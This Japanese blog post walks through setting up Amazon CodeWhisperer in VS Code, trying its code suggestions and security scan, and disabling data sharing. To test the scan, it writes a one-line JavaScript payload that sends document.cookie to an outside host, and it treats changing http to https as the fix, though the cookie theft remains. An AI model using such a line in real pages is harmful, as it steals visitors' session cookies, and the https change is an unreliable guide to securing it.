はじめに
今回は、AIコーディング支援サービスである、Amazon CodeWhispererを試してみました。
類似サービスのGitHub Copilotについて、試してみた記事も参考にしてください。
AIを活用することにより、初心者の方でもプログラミングに対するハードルは下がると思いますし、ベテランエンジニアでも不具合対応やよりよいコードを提案してもらえたらとても便利だと思います。
Amazon CodeWhispererについて
Amazon CodeWhispererは、開発環境 (IDE) でリアルタイムのコード提案を行ってくれます。
2022年にプレビュー版が公開されましたが、今回正式版になりました。
data:image/s3,"s3://crabby-images/29766/2976694984bcf1c62a18d32c27c94133d12c6635" alt=""
個人の場合は無料で利用することができます。
また、コードのセキュリティスキャンを行うことができます。
サポートされている言語は現時点で以下です。
Python, Java, JavaScript, TypeScript, C#, Rust, Go, Ruby, Scala, Kotlin, PHP, C, C++, Shell Scripting, SQL
コードセキュリティスキャンは、現時点で以下の言語に対応しています。
Python, Java, JavaScript
AWSアカウントを持っている必要はなく、メールアドレスのみで利用することができます。
インストール
様々なIDEをサポートしていますが、今回はVS Codeを利用します。
VS Codeのインストール方法は、以下の記事にまとめましたのでご覧ください。
VS Codeのオススメ設定や拡張機能などは、以下の記事にまとめました。
VS Codeを起動します。
拡張機能を開き、「AWS Toolkit」をインストールします。
data:image/s3,"s3://crabby-images/944a0/944a020c48dd5059f454ac4f253b5d61dc7bb87e" alt="AWS Toolkit"
アカウント登録
AWSパネルを開き、「Connect to AWS to Get Started…」をクリックします。
data:image/s3,"s3://crabby-images/bacce/baccea28a0d3ae62f95ca8e9e81dd2f910fe39ed" alt="VS Code Connect to AWS to Get Started..."
「Use a personal email to sign up and sign in with AWS builder ID」を選択します。
data:image/s3,"s3://crabby-images/85873/85873be223b198dc5a29c28c5af4fb7adb52a7b3" alt="VS Code Use a personal email to sign up and sign in with AWS builder ID"
「Copy Code and Proceed」をクリックし、コードをコピーします。
data:image/s3,"s3://crabby-images/a6257/a6257f2327e2b1441317ce53fa72254da7cc9e41" alt="Copy Code and Proceed"
Webサイトを開きます。
data:image/s3,"s3://crabby-images/0b7f5/0b7f5c03e5f0cb70932f311069affb7c62381e97" alt="Code Webサイトを開く"
先ほどコピーしたコードを入力します。
data:image/s3,"s3://crabby-images/40141/401415df20122dc0488d5e67076e65ba0345b8e9" alt="AWS authorize request"
メールアドレスを入力し、AWSビルダーIDを作成します。
data:image/s3,"s3://crabby-images/effcc/effcc3c9422714b454eda660fad9eaabb4385c6f" alt="AWS ビルダーIDの作成"
名前を入力します。
名前は他のユーザにも表示される可能性があるとのことです。
data:image/s3,"s3://crabby-images/25556/2555651173ce751225cb4ae6cb5db31ad734774e" alt="AWS Create your AWS Builder ID"
メールアドレスに検証コードが届きますので入力します。
data:image/s3,"s3://crabby-images/7b5c6/7b5c6f227719e6203c655750f271c623de7027e3" alt="AWS Email verification"
パスワードを設定します。
data:image/s3,"s3://crabby-images/676a8/676a8ae08719f4b736e12b93203b3336a213374a" alt="AWS パスワードを選択"
「Allow」をクリックします。
data:image/s3,"s3://crabby-images/fe4b6/fe4b60255b7fa2e902050f210768e92701a031d3" alt=""
これで使う準備が完了しました。
data:image/s3,"s3://crabby-images/9d80d/9d80dc771b3e13abe95b98eba7174f0d7a87a5b3" alt="AWS Toolkit for VSCode"
コーディング
それでは試してみましょう。
「Resume Auto-Suggestions」をクリックし、有効にします。
data:image/s3,"s3://crabby-images/22b16/22b160997e61a7bd8085f88efca5c0f2f1ff0b63" alt="Resume Auto-Suggestions"
コーディングを行うと、コードの提案を行ってくれました。
data:image/s3,"s3://crabby-images/03255/03255a9642f2a7b83ced5929c6d0d491be65c3aa" alt="Amazon CodeWhisperer コード提案"
セキュリティスキャンも試してみましょう。
スキャンしたいソースコードを開き、「Run Security Scan」をクリックします。
data:image/s3,"s3://crabby-images/709ec/709ec9f6b5cc167be2ca069ab24eda29df3631e9" alt="Amazon CodeWhisperer Run Security Scan"
適当なコードを書きました。
location.href = 'http://chigusa-web.com/?cookie=' + document.cookie;
一つ問題を発見してくれました。
data:image/s3,"s3://crabby-images/b7809/b7809e65928ef09ae81a765ed89c4b21f752d291" alt="Amazon CodeWhisperer 問題発見"
暗号化されていないための警告です。コードをhttpsに変更したところ、改善されました。
CWE-319 - Insecure connection using unencrypted protocol: Connections that use insecure protocols transmit data in cleartext. This introduces a risk of exposing sensitive data to third parties.
データの共有について
CodeWhispererは、AWSのサービス改善の目的で、使用状況とコンテンツに関するデータを保存する場合があります。
VS Codeで無効にする方法は以下です。
テレメトリの共有
「Enable AWS Toolkit to send usage data to AWS.」のチェックをオフにします。
data:image/s3,"s3://crabby-images/214f5/214f5b98cb59ec9f3af948e26fa85fe6ed759d87" alt="Amazon CodeWhisperer Enable AWS Toolkit to send usage data to AWS"
コンテンツの共有
「Share CodeWhisperer Content With AWS」のチェックをオフにします。
data:image/s3,"s3://crabby-images/8dd0c/8dd0cc348d32b9afdd06a58c70f2eafe6c453a05" alt="Amazon CodeWhisperer Share CodeWhisperer Content With AWS"
注意点
提案されたコードが正しいかどうかは、必ず確認する必要があります。
不具合・脆弱性がある場合や、提案されたコードよりもっと良いコードがあるかもしれません。
さいごに
今回は、AIコーディング支援サービスである、Amazon CodeWhispererを試してみました。
コーディングをするのが便利になるでしょう。
是非試してみてください。
コメント